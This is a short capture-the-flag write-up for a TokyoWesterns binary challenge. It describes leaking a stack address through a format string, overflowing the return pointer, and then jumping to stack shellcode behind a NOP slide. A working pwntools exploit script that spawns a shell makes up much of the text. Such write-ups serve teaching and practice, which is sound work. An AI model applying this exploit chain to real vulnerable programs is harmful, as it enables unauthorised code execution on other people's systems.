Japan is fucking hot. nc nothing.chal.ctf.westerns.tokyo 10001
The binary has no security mechanisms enabled, we can overflow the buffer and can exploit format strings! This gives many exploit possibilities, I decided to place shellcode on the stack and overwrite the RIP
to jump to it. The only challenge is to deal with ASLR
and find a reliable way to leak an address that points on the shellcode.
Thanks to the format string vulnerability I could search for offsets whose contents are addresses that point somewhere in the program memory space and calculated offsets that point to the overwritten buffer. So on the first stage the input is a format string to leak an address and overflow the RIP
to point to the main
function to recursively call it again for another input.
On the second stage the input is a large NOP
slide and then the shellcode and an address to overwrite the RIP
that hopefully points somewhere on the NOP
Exploit script:
from pwn import *
shellcode = asm(shellcraft.sh())
p = process('warmup')
# p = remote("nothing.chal.ctf.westerns.tokyo", 10001)
fmt_str = '%47$p'
p.sendline(fmt_str + '\x41' * (264-len(fmt_str)) + p64(0x4006ba))
resp = p.recvuntil(':)\n')
print resp
stk = resp[2:14]
RIP = p64(int(stk,16) - 400)
p.sendline('\x5a' * (264-len(shellcode)) + shellcode + RIP)